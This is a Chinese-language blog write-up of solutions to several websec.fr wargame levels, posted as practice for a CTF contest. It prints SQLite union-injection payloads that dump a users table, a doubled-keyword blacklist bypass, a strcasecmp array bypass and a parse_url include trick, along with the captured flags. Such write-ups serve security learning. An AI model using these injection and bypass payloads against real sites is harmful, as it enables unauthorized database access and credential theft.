首页 > itarticle > wp for websec

wp for websec

admin 11月 13, 2020 0

网鼎杯比赛找来的练习题

http://websec.fr/

level 01

sqlite注入:
有sqlite_master这个总表,name和sql字段包含了其他表信息

input:
1 and 1=0 union select 1,(select name from sqlite_master)--+

GOT : users

input:
1 and 1=0 union select 1,(select sql from sqlite_master)--+

GOT :
CREATE TABLE users(id int(7), username varchar(255), password varchar(255))

input:
1 and 1=0 union select 1,(select group_concat(password) from users)--+

GOT : WEBSEC{Simple_SQLite_Injection}

level 02

sqlite injection bypass preg_replace for union, order, select, from, group, by

eg. select-> but selselectect->select

input :
1 and 1=0 ununionion seselectlect 1,(seselectlect grgroupoup_concat(password) frofromm users)--+

GOT : WEBSEC{BecauseBlacklistsAreOftenAgoodIdea}

level 03

level 17

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 

include "flag.php";

function () { 
        $range = 100000;
        $bytes = (int) (log($range, 2) / 8) + 1;
        do {  /* Side effect: more random cpu cycles wasted ;) */
            $rnd = hexdec(bin2hex(openssl_random_pseudo_bytes($bytes)));
        } while ($rnd >= $range);
        usleep($rnd);
}
?>

    if (! strcasecmp ($_POST['flag'], $flag))
        echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';   
    else
        echo '<div class="alert alert-danger">Invalid flag, sorry.</div>';
    ?>

Actually,it’s just a strcasecmp bypass trick,like strcmp.So we Post an array and get flag.
GOT:WEBSEC{It_seems_that_php_could_use_a_stricter_typing_system}.

level 25

source code:

1
2
3
4
5
6
7
8
 

parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}

include $_GET['page'] . '.txt';

If we make parse_url($_SERVER['REQUEST_URI']) = null,we will by pass the function.
So.We use:
http://websec.fr/level25/index.php?a=a:123/index.php&page=flag

parse
Got:WEBSEC{How_am_I_supposed_to_parse_uri_when_everything_is_so_broooken}

微海报分享

近期文章

近期评论

标签

热门

文章归档

分类目录

功能